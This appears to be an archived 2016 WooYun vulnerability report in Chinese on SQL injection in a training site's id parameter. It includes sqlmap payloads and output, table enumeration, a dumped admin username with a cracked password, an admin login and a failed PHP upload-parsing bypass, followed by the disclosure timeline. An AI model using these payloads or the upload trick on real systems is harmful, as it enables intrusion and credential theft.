乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-21: 细节已通知厂商并且等待厂商处理中 2016-01-21: 厂商已经确认,细节仅向厂商公开 2016-01-31: 细节向核心白帽子及相关领域专家公开 2016-02-10: 细节向普通白帽子公开 2016-02-20: 细节向实习白帽子公开 2016-03-05: 细节向公众公开
注入点:
http://**.**.**.**/index.php?do=show&page=3-3&id=2
Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: do=show&page=3-3&id=2 AND 6193=6193 Type: UNION query Title: MySQL UNION query (NULL) - 10 columns Payload: do=show&page=3-3&id=-2494 UNION SELECT NULL, NULL, NULL, NULL, N, NULL, NULL, NULL, CONCAT(0x3a7373763a,0x504c625179504a455861,0x3a69646c3a),LL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: do=show&page=3-3&id=2 AND SLEEP(5)---[15:53:47] [INFO] the back-end DBMS is MySQLweb application technology: Apacheback-end DBMS: MySQL 5.0.11[15:53:47] [INFO] fetching current usercurrent user: 'mindmapp@%'
available databases [2]:[*] information_schema[*] mindmapping
Database: mindmapping[21 tables]+---------------------------------------+| bz_admin || bz_case || bz_client || bz_config || bz_ebook || bz_faq || bz_news || bz_rank || bz_realreport || bz_sector || bz_share || bz_story || bz_student || bz_subscribe || bz_testimonia || bz_timedate || bz_timetable || bz_trainer || ip2nation || nation2country || webstats |+---------------------------------------+Database: information_schema[28 tables]+---------------------------------------+| CHARACTER_SETS || COLLATIONS || COLLATION_CHARACTER_SET_APPLICABILITY || COLUMNS || COLUMN_PRIVILEGES || ENGINES || EVENTS || FILES || GLOBAL_STATUS || GLOBAL_VARIABLES || KEY_COLUMN_USAGE || PARTITIONS || PLUGINS || PROCESSLIST || PROFILING || REFERENTIAL_CONSTRAINTS || ROUTINES || SCHEMATA || SCHEMA_PRIVILEGES || SESSION_STATUS || SESSION_VARIABLES || STATISTICS || TABLES || TABLE_CONSTRAINTS || TABLE_PRIVILEGES || TRIGGERS || USER_PRIVILEGES || VIEWS |+---------------------------------------+
爆admin
Database: mindmapping+----------+---------+| Table | Entries |+----------+---------+| bz_admin | 1 |+----------+---------+
Table: bz_admin[1 entry]+----------------------------------+----------+| password | username |+----------------------------------+----------+| 4e77c53024fe63740d91709c1fd77d7e(780325) | alice |+----------------------------------+----------+
解密780325来登入后台
http://**.**.**.**/admin/
阿帕奇中间件,php脚本,但是处处检测
http://**.**.**.**/uploadfiles/123dorr.php;_160121.jpg
最终没能解析成功
危害等级:高
漏洞Rank:18
确认时间:2016-01-21 22:54
感謝通報!
暂无